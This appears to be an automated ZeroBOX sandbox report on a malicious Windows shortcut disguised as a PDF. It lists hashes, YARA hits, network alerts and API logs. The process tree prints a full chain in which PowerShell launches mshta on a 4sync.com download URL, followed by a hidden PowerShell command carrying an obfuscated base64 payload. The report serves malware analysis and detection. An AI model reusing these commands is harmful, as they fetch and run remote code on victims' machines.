Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 2, 2025, 8:52 a.m.	May 2, 2025, 8:54 a.m.

Size	427.5KB
Type	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`21001f61225587ddc477861c8c6194e9`
SHA256	`a6c105746ed8704d74b793ef0b04c8eac1e48fbb34db69d7c8e43a9a43ec82a6`
CRC32	`D78A82CC`
ssdeep	`24:8Ayw/BHYVKVWO+/CWR62fVTlP4HOCgAXuoUeVdd79dsoEZ/7QAMN5:8y5al62fVRPKxdJ9ha7Q`
Yara	Lnk_Format_Zero - LNK Format Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\pupa.pdf.lnk
2556
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77')
  2668
  - mshta.exe "C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
    2824
    - cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
      3000
      - powershell.exe powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
        3068

Name	Response	Post-Analysis Lookup
dc438.4sync.com	A 199.101.133.66	199.101.133.66
www.4sync.com	A 199.101.134.238 A 204.155.149.140	199.101.134.238

IP Address	Status	Action
164.124.101.2	Active	Moloch
199.101.133.66	Active	Moloch
204.155.149.140	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2055337	ET INFO File Sharing Related Domain in DNS Lookup (4sync .com)	Misc activity
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2055337	ET INFO File Sharing Related Domain in DNS Lookup (4sync .com)	Misc activity
TCP 192.168.56.101:49167 -> 204.155.149.140:443	2055338	ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI	Misc activity
TCP 192.168.56.101:49167 -> 204.155.149.140:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 199.101.133.66:443	2055338	ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI	Misc activity
TCP 192.168.56.101:49169 -> 199.101.133.66:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 199.101.133.66:443	2055338	ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49167 204.155.149.140:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	CN=*.4sync.com	79:05:c7:c6:c9:8f:a1:23:11:21:c5:5c:69:e4:ec:91:a6:9c:71:0b
TLSv1 192.168.56.101:49169 199.101.133.66:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	CN=*.4sync.com	79:05:c7:c6:c9:8f:a1:23:11:21:c5:5c:69:e4:ec:91:a6:9c:71:0b

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 2, 2025, 8:52 a.m.			0	0
IsDebuggerPresent May 2, 2025, 8:52 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: Processing -WindowStyle 'h' failed: Cannot convert value "h" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 55 events)

Time & API	Arguments	Status	Return
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adf30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ade70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ade70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ade70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005adc30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ae030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ad9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
